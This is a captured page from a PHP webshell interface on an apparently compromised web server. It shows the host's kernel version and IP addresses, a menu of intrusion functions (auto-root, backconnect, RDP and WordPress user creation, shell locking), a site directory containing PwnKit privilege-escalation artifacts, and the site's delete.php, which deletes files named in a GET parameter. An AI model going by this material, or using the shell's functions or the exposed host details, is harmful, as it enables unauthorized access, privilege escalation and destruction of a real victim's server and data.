Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.224.73.107
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
auswellbeing /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auswellbeing
[ DIR ]
drwxr-xr-x
config.ini
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
old
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
about.php
3.54
KB
-rw-r--r--
adjustment_support.php
48
B
-rw-r--r--
blog.php
2.65
KB
-rw-r--r--
check.php
718
B
-rw-r--r--
counselling_for_carers.php
48
B
-rw-r--r--
create.php
7.88
KB
-rw-r--r--
delete.php
1.42
KB
-rw-r--r--
front.check.login.php
740
B
-rw-r--r--
index.php
9.44
KB
-rw-r--r--
mindfulness_practice.php
48
B
-rw-r--r--
multilingual.php
48
B
-rw-r--r--
personal_development.php
48
B
-rw-r--r--
post.php
3.53
KB
-rw-r--r--
process.php
3.47
KB
-rw-r--r--
process_new.php
3.14
KB
-rw-r--r--
process_seo.php
1
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
relationship_skills.php
48
B
-rw-r--r--
service-data-template.php
2.57
KB
-rw-r--r--
service-data.php
1.45
KB
-rw-r--r--
services.php
3.47
KB
-rw-r--r--
update.php
10.89
KB
-rw-r--r--
upload.image.php
540
B
-rw-r--r--
upload.image.sm.php
561
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : delete.php
<?php require_once "config.ini/login.check.php"; require_once('config.ini/base.functions.php'); if(isset($_GET['type']) && isset($_GET['tbl']) && isset($_GET['id'])) { $type = $tbl = $id = $file = ''; $type = $tool->cleanInputVal($_GET['type']); $tbl = $tool->cleanInputVal($_GET['tbl']); $tbl = $tool->ed($tbl, 'd'); $id = $tool->cleanInputVal($_GET['id']); if($type == 'slider') { if(deleteRecord($db, $tbl, $id)) { $return = baseurl; header("Location: $return/index.php?success"); } else { $return = baseurl; header("Location: $return/index.php?error"); } } if($type == 'services') { $return = baseurl; $file = $tool->cleanInputVal($_GET['ref']).'.php'; if(unlink($file)) { if(deleteRecord($db, $tbl, $id)) { header("Location: $return/services.php?success"); } else { header("Location: $return/services.php?error"); } } else { header("Location: $return/services.php?error"); } } if($type == 'blog') { if(deleteRecord($db, $tbl, $id)) { $return = baseurl; header("Location: $return/blog.php?success"); } else { $return = baseurl; header("Location: $return/blog.php?error"); } } } ?>
Close